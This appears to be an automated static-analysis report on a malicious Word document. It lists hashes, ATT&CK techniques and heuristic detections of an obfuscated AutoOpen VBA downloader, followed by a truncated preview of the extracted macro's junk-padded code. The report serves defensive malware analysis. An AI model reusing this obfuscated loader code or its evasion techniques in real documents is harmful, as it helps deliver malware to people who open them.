Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 82822a6d9b3d52a0…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 276.5 KB
Created: 2019-10-10 12:17:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: e17da5e8a15e60488592b74c60a0cf9e
SHA-1: f960912e8b99eed19bdbd65da4dcae4ca8f70118
SHA-256: 82822a6d9b3d52a07fb3de64bdeefcbe471e2fb5fa06d31452c07a7c0b71c6ad
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The file contains heavily obfuscated VBA macros, including an AutoOpen function and CreateObject calls, indicative of a downloader. ClamAV detection as 'Doc.Downloader.Generic-7331201-0' further supports this. The obfuscated nature of the VBA code prevents a confident identification of the specific payload or download URL, leading to an 'unknown family' classification.

Heuristics (8)

  • ClamAV: Doc.Downloader.Generic-7331201-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7331201-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, so that no visible source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 74054 bytes
SHA-256: 214ff119089dadfd6c388e39898a21c14efd64ed742278f1e186104ff19ca616

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "cc00112055x8"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "xx0252948xc88, 0, 0, MSForms, TextBox"
Attribute VB_Control = "cb790114020, 1, 1, MSForms, TextBox"
Attribute VB_Control = "b0c006678b000, 2, 2, MSForms, TextBox"
Attribute VB_Control = "bx29c2x53284, 3, 3, MSForms, TextBox"
Attribute VB_Control = "b50c90b0800, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c6311020b058, 5, 5, MSForms, TextBox"

Attribute VB_Name = "b08c1132724b"
Function x101x0872006()
On Error Resume Next
   c7212b6xc007c = True
'Forward46131 Mossie Vista, Swaniawskiville, Samoa Direct75818 Toney Isle, New Rahul, Samoa
c62410007090 = Round(b0304508040)
c5000040x20 = False
'District1697 Brekke Mews, East Dayanaland, Guinea Global93841 Schneider Street, Kossland, Tonga
c792620x80870 = Round(x80417050x002)
c607810709b2 = True
'Central400 Terrill Lock, Port Tessie, Central African Republic Legacy52360 Houston Meadow, Kirlinburgh, Palestinian Territory
x2x7803439c0 = Round(x756012b7c96x)
cc38089018bc2 = True
'District2338 Labadie Centers, Port Bransonmouth, Azerbaijan International264 Moore Circles, Mantestad, Burundi
b0bb22262c2 = Round(c0b014870bc27)
c0x00390500 = True
'Senior5062 Cale Rue, North Jovan, Iceland Forward29106 Kautzer Route, Lennaville, Guinea
bx676xb26c00 = Round(b00097x84b313)
c048c097796 = True
'Corporate637 Ashton Grove, Huelshire, Venezuela Lead4024 Bosco Ramp, Port Sandraland, Nigeria
b9bb28bx6bbc4 = Round(b2290c0c6c49)
bbc0b280109 = False
'District5546 Friedrich Route, North Christ, Equatorial Guinea Central55859 Hagenes Union, Hellerside, Germany
x0260xbc250 = Round(b77000c01x0c3)
bb3x0b9218890 = False
'Forward93262 Vance Valley, Blancatown, Belarus Dynamic11521 Sanford Place, Wisozkhaven, Congo
b3230b32b00 = True
'Investor2923 Marion Courts, Jensenmouth, Cape Verde Senior3451 Quentin Viaduct, Martinabury, Northern Mariana Islands
c3353b81b0080 = Round(x1c30c470000)
x100050214930 = False
'Chief989 Kessler Centers, Heathcoteshire, Jordan Dynamic9487 Beverly Hill, East Tressa, Sudan
b8x000076405 = Round(b5c740600006)
c8520x520bc = False
'Direct5943 Zackary Road, Aminachester, Central African Republic Dynamic7419 Roma Manors, Felixbury, China
b550xb090605 = Round(b0bx4000006)
cc7b566033x05 = False
'Direct8044 Kuvalis Flat, East Steve, Niue Investor2323 Lonzo Stravenue, South Bridgette, Northern Mariana Islands
cb8010040x9 = Round(c65442063430)
x6x20060039 = True
'Investor838 Gutkowski Islands, Lueilwitzport, French Polynesia Direct081 McLaughlin Pass, South Millie, Montserrat
x00b980b0073c = Round(b820b060909cx)
x9b5805371cx5 = False
'Human024 Ima Canyon, McKenziechester, United States Minor Outlying Islands Global15142 Mohammad Mission, Mossiehaven, Belgium
c0496cx02070 = Round(x602x00289x0)
c00b12009237b = True
'Internal41554 Theo River, Gloriaton, Niue Principal59605 Beahan Glens, Lake Dillanmouth, Puerto Rico
bx03079c94078 = Round(c603b2b6906b0)
b905b8c83bx0b = False
'International27205 Adele Spurs, Mullerburgh, Albania Legacy0872 Samantha Lane, Kennediborough, Guatemala
   x8x21360xc252 = False
'Investor337 Thiel Road, Corneliusville, France Regional086 Graham Groves, Lake Marcos, France
b4095x085x4 = Round(c720000094x0)
b6x82338x00 = True
'Investor94636 Isom Fields, Rodriguezstad, Pakistan Regional680 Maybelle Crescent, Dorthyberg, Gabon
b071071040664 = Round(b000003b43b)
x6600060bc125 = True
'Global0916 Elva Path, Port Dawnhaven, Saudi Arabia Investor494 Ratke Hills, Vivienneville, Uganda
b6c0310x0x3 = Round(c109c16038065)
c973335011b0 = True
'Global8685 Vincenza Plains, East Joanne, Papua New Guinea Dynamic9295 Jakob Garden, Karianneshire, Benin
c0406x015b10 = Round(c340041c4x0)
b96b5c480390 = False
'Lead4000 Hildegard Divide, New Virgilland, Russian Federation Customer8735 Lynn Forks, Au
... (truncated)